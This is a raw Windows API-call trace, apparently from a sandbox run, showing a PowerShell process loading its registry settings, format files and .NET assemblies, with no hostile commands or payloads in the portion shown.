	[0141.959] CoTaskMemFree (pv=0x4652d0) 
	[0141.959] CoTaskMemAlloc (cb=0xcc) returned 0x4ec8b0
	[0141.959] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x4ec8b0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0141.959] CoTaskMemFree (pv=0x4ec8b0) 
	[0141.960] CoTaskMemAlloc (cb=0xcc) returned 0x4ec8b0
	[0141.960] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4ec8b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.960] CoTaskMemFree (pv=0x4ec8b0) 
	[0141.964] RegCloseKey (hKey=0x328) returned 0x0
	[0141.964] CoTaskMemAlloc (cb=0xcc) returned 0x4ec8b0
	[0141.964] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4ec8b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.964] CoTaskMemFree (pv=0x4ec8b0) 
	[0141.964] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d7b8 | out: phkResult=0x29d7b8*=0x328) returned 0x0
	[0141.964] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x29d73c, lpData=0x0, lpcbData=0x29d738*=0x0 | out: lpType=0x29d73c*=0x0, lpData=0x0, lpcbData=0x29d738*=0x0) returned 0x2
	[0141.964] RegCloseKey (hKey=0x328) returned 0x0
	[0145.583] CoTaskMemAlloc (cb=0x20c) returned 0x1b837250
	[0145.583] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b837250 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0146.440] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0146.441] GetFileType (hFile=0x334) returned 0x1
	[0146.441] SetErrorMode (uMode=0x1) returned 0x1
	[0146.442] GetFileType (hFile=0x334) returned 0x1
	[0146.445] ReadFile (in: hFile=0x334, lpBuffer=0x2e32e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d3b8, lpOverlapped=0x0 | out: lpBuffer=0x2e32e58*, lpNumberOfBytesRead=0x29d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.448] ReadFile (in: hFile=0x334, lpBuffer=0x2e32e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d3b8, lpOverlapped=0x0 | out: lpBuffer=0x2e32e58*, lpNumberOfBytesRead=0x29d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.448] ReadFile (in: hFile=0x334, lpBuffer=0x2e32e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d3b8, lpOverlapped=0x0 | out: lpBuffer=0x2e32e58*, lpNumberOfBytesRead=0x29d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.449] ReadFile (in: hFile=0x334, lpBuffer=0x2e32e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d3b8, lpOverlapped=0x0 | out: lpBuffer=0x2e32e58*, lpNumberOfBytesRead=0x29d3b8*=0xcf3, lpOverlapped=0x0) returned 1
	[0146.449] ReadFile (in: hFile=0x334, lpBuffer=0x2e322b3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x29d3b8, lpOverlapped=0x0 | out: lpBuffer=0x2e322b3*, lpNumberOfBytesRead=0x29d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0146.449] ReadFile (in: hFile=0x334, lpBuffer=0x2e32e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d3b8, lpOverlapped=0x0 | out: lpBuffer=0x2e32e58*, lpNumberOfBytesRead=0x29d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0146.451] CloseHandle (hObject=0x334) returned 1
	[0148.346] GetSystemInfo (in: lpSystemInfo=0x29c050 | out: lpSystemInfo=0x29c050*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0148.347] VirtualQuery (in: lpAddress=0x29c100, lpBuffer=0x29cfc0, dwLength=0x30 | out: lpBuffer=0x29cfc0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0154.448] VirtualQuery (in: lpAddress=0x29c100, lpBuffer=0x29cfc0, dwLength=0x30 | out: lpBuffer=0x29cfc0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.883] VirtualQuery (in: lpAddress=0x29c100, lpBuffer=0x29cfc0, dwLength=0x30 | out: lpBuffer=0x29cfc0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.884] VirtualQuery (in: lpAddress=0x29c100, lpBuffer=0x29cfc0, dwLength=0x30 | out: lpBuffer=0x29cfc0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.884] VirtualQuery (in: lpAddress=0x29c100, lpBuffer=0x29cfc0, dwLength=0x30 | out: lpBuffer=0x29cfc0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.885] VirtualQuery (in: lpAddress=0x29c100, lpBuffer=0x29cfc0, dwLength=0x30 | out: lpBuffer=0x29cfc0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.886] VirtualQuery (in: lpAddress=0x29c100, lpBuffer=0x29cfc0, dwLength=0x30 | out: lpBuffer=0x29cfc0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.887] VirtualQuery (in: lpAddress=0x29c100, lpBuffer=0x29cfc0, dwLength=0x30 | out: lpBuffer=0x29cfc0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.219] VirtualQuery (in: lpAddress=0x29c100, lpBuffer=0x29cfc0, dwLength=0x30 | out: lpBuffer=0x29cfc0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.220] VirtualQuery (in: lpAddress=0x29c100, lpBuffer=0x29cfc0, dwLength=0x30 | out: lpBuffer=0x29cfc0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.222] VirtualQuery (in: lpAddress=0x29c100, lpBuffer=0x29cfc0, dwLength=0x30 | out: lpBuffer=0x29cfc0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.227] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0159.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.228] CoTaskMemFree (pv=0x4be2b0) 
	[0159.649] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d5b8 | out: phkResult=0x29d5b8*=0x324) returned 0x0
	[0159.649] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x29d5cc, lpData=0x0, lpcbData=0x29d5c8*=0x0 | out: lpType=0x29d5cc*=0x1, lpData=0x0, lpcbData=0x29d5c8*=0x74) returned 0x0
	[0159.649] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x29d53c, lpData=0x0, lpcbData=0x29d538*=0x0 | out: lpType=0x29d53c*=0x1, lpData=0x0, lpcbData=0x29d538*=0x74) returned 0x0
	[0159.649] CoTaskMemAlloc (cb=0x78) returned 0x4652d0
	[0159.649] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x29d50c, lpData=0x4652d0, lpcbData=0x29d508*=0x74 | out: lpType=0x29d50c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x29d508*=0x74) returned 0x0
	[0159.947] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0159.947] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.947] CoTaskMemFree (pv=0x4be2b0) 
	[0159.953] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0159.953] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.953] CoTaskMemFree (pv=0x4be2b0) 
	[0159.955] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0159.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.955] CoTaskMemFree (pv=0x4be2b0) 
	[0159.957] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0159.957] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.957] CoTaskMemFree (pv=0x4be2b0) 
	[0160.003] ReadFile (in: hFile=0x308, lpBuffer=0x33abba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d128, lpOverlapped=0x0 | out: lpBuffer=0x33abba0*, lpNumberOfBytesRead=0x29d128*=0x1000, lpOverlapped=0x0) returned 1
	[0160.019] ReadFile (in: hFile=0x308, lpBuffer=0x33abba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d128, lpOverlapped=0x0 | out: lpBuffer=0x33abba0*, lpNumberOfBytesRead=0x29d128*=0x1000, lpOverlapped=0x0) returned 1
	[0160.038] ReadFile (in: hFile=0x308, lpBuffer=0x33abba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d128, lpOverlapped=0x0 | out: lpBuffer=0x33abba0*, lpNumberOfBytesRead=0x29d128*=0x1000, lpOverlapped=0x0) returned 1
	[0160.056] ReadFile (in: hFile=0x308, lpBuffer=0x33abba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d128, lpOverlapped=0x0 | out: lpBuffer=0x33abba0*, lpNumberOfBytesRead=0x29d128*=0x1000, lpOverlapped=0x0) returned 1
	[0160.090] ReadFile (in: hFile=0x308, lpBuffer=0x33abba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d128, lpOverlapped=0x0 | out: lpBuffer=0x33abba0*, lpNumberOfBytesRead=0x29d128*=0x1000, lpOverlapped=0x0) returned 1
	[0160.110] ReadFile (in: hFile=0x308, lpBuffer=0x33abba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d128, lpOverlapped=0x0 | out: lpBuffer=0x33abba0*, lpNumberOfBytesRead=0x29d128*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.134] ReadFile (in: hFile=0x308, lpBuffer=0x33ab0ea, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x29d128, lpOverlapped=0x0 | out: lpBuffer=0x33ab0ea*, lpNumberOfBytesRead=0x29d128*=0x0, lpOverlapped=0x0) returned 1
	[0160.156] ReadFile (in: hFile=0x308, lpBuffer=0x33abba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d128, lpOverlapped=0x0 | out: lpBuffer=0x33abba0*, lpNumberOfBytesRead=0x29d128*=0x0, lpOverlapped=0x0) returned 1
	[0160.185] CloseHandle (hObject=0x308) returned 1
	[0160.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x29ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.204] SetErrorMode (uMode=0x1) returned 0x1
	[0160.204] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x29d0d0 | out: lpFileInformation=0x29d0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.334] SetErrorMode (uMode=0x1) returned 0x1
	[0160.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x29ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.334] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d1b8 | out: phkResult=0x29d1b8*=0x308) returned 0x0
	[0160.335] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29d13c, lpData=0x0, lpcbData=0x29d138*=0x0 | out: lpType=0x29d13c*=0x1, lpData=0x0, lpcbData=0x29d138*=0x56) returned 0x0
	[0160.335] CoTaskMemAlloc (cb=0x5a) returned 0x4c7b00
	[0160.335] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29d10c, lpData=0x4c7b00, lpcbData=0x29d108*=0x56 | out: lpType=0x29d10c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x29d108*=0x56) returned 0x0
	[0160.335] CoTaskMemFree (pv=0x4c7b00) 
	[0160.335] RegCloseKey (hKey=0x308) returned 0x0
	[0160.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x29ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x29ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.347] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0xba73d66b, Data2=0x950f, Data3=0x4298, Data4=([0]=0x82, [1]=0x6c, [2]=0xe4, [3]=0xcf, [4]=0xcb, [5]=0xf0, [6]=0x60, [7]=0x39))) returned 0x0
	[0160.363] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0xec04a5f4, Data2=0xbd80, Data3=0x404b, Data4=([0]=0x9b, [1]=0x54, [2]=0x47, [3]=0x76, [4]=0xdf, [5]=0x4b, [6]=0xcc, [7]=0x87))) returned 0x0
	[0160.872] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0xe0901fd4, Data2=0x8630, Data3=0x4f9d, Data4=([0]=0xbf, [1]=0x8d, [2]=0x66, [3]=0x8a, [4]=0x4c, [5]=0x67, [6]=0xa6, [7]=0xd5))) returned 0x0
	[0160.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x29c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0160.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0160.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x29c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0165.202] VirtualQuery (in: lpAddress=0x29bc50, lpBuffer=0x29cb10, dwLength=0x30 | out: lpBuffer=0x29cb10*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.203] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0x5edc6e05, Data2=0xf3a3, Data3=0x4327, Data4=([0]=0x9b, [1]=0x85, [2]=0xb4, [3]=0xc7, [4]=0xf1, [5]=0xa1, [6]=0xce, [7]=0x7a))) returned 0x0
	[0165.204] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0xb0229364, Data2=0x10e7, Data3=0x419a, Data4=([0]=0xbe, [1]=0x31, [2]=0xe3, [3]=0x94, [4]=0x6a, [5]=0x58, [6]=0xac, [7]=0x24))) returned 0x0
	[0165.204] VirtualQuery (in: lpAddress=0x29be00, lpBuffer=0x29ccc0, dwLength=0x30 | out: lpBuffer=0x29ccc0*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.206] VirtualQuery (in: lpAddress=0x29be00, lpBuffer=0x29ccc0, dwLength=0x30 | out: lpBuffer=0x29ccc0*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.207] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0xb79ad69e, Data2=0xb453, Data3=0x47f7, Data4=([0]=0x9d, [1]=0xa8, [2]=0x51, [3]=0xea, [4]=0x1f, [5]=0x55, [6]=0x60, [7]=0xd8))) returned 0x0
	[0165.209] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0xe90b75e7, Data2=0x3987, Data3=0x4acc, Data4=([0]=0x89, [1]=0x6e, [2]=0xec, [3]=0xb5, [4]=0x3e, [5]=0x7, [6]=0x64, [7]=0xd))) returned 0x0
	[0165.210] VirtualQuery (in: lpAddress=0x29c050, lpBuffer=0x29cf10, dwLength=0x30 | out: lpBuffer=0x29cf10*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.214] VirtualQuery (in: lpAddress=0x29b6c0, lpBuffer=0x29c580, dwLength=0x30 | out: lpBuffer=0x29c580*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.978] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0xb3ad1b59, Data2=0x4f10, Data3=0x48dd, Data4=([0]=0xbb, [1]=0xc9, [2]=0xb8, [3]=0x1, [4]=0xfd, [5]=0xa7, [6]=0x9b, [7]=0x8))) returned 0x0
	[0165.978] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0x9d42f11c, Data2=0xde62, Data3=0x47a7, Data4=([0]=0x81, [1]=0x82, [2]=0x40, [3]=0x62, [4]=0xc9, [5]=0x87, [6]=0xbe, [7]=0x72))) returned 0x0
	[0165.979] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0xd5c5c4df, Data2=0xfdaa, Data3=0x4bd3, Data4=([0]=0x90, [1]=0xf0, [2]=0xfa, [3]=0x29, [4]=0x6, [5]=0x52, [6]=0xa3, [7]=0x1))) returned 0x0
	[0165.979] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0x396289e7, Data2=0x9897, Data3=0x4eb4, Data4=([0]=0x84, [1]=0xcb, [2]=0x57, [3]=0xe0, [4]=0x72, [5]=0x49, [6]=0x84, [7]=0x8d))) returned 0x0
	[0165.980] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0x76d28429, Data2=0xcdd6, Data3=0x4641, Data4=([0]=0xa5, [1]=0x6c, [2]=0xc6, [3]=0x49, [4]=0x49, [5]=0x26, [6]=0xdd, [7]=0xe4))) returned 0x0
	[0165.980] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0x32a80bc5, Data2=0xd410, Data3=0x4dba, Data4=([0]=0x84, [1]=0xc7, [2]=0xc0, [3]=0x80, [4]=0x7d, [5]=0x58, [6]=0x70, [7]=0x1d))) returned 0x0
	[0165.981] VirtualQuery (in: lpAddress=0x29bd90, lpBuffer=0x29cc50, dwLength=0x30 | out: lpBuffer=0x29cc50*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0165.981] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0xbdd77ecd, Data2=0xf497, Data3=0x4943, Data4=([0]=0x9b, [1]=0x84, [2]=0x86, [3]=0xaf, [4]=0x1c, [5]=0x85, [6]=0xad, [7]=0xfc))) returned 0x0
	[0165.982] VirtualQuery (in: lpAddress=0x29bd90, lpBuffer=0x29cc50, dwLength=0x30 | out: lpBuffer=0x29cc50*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0165.982] VirtualQuery (in: lpAddress=0x29bd90, lpBuffer=0x29cc50, dwLength=0x30 | out: lpBuffer=0x29cc50*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0176.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.586] CoCreateGuid (in: pguid=0x29d3e0 | out: pguid=0x29d3e0*(Data1=0xc6345fdf, Data2=0x5d49, Data3=0x4bdf, Data4=([0]=0x8f, [1]=0xb9, [2]=0xfe, [3]=0x7f, [4]=0x59, [5]=0xac, [6]=0x54, [7]=0xe5))) returned 0x0
	[0176.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
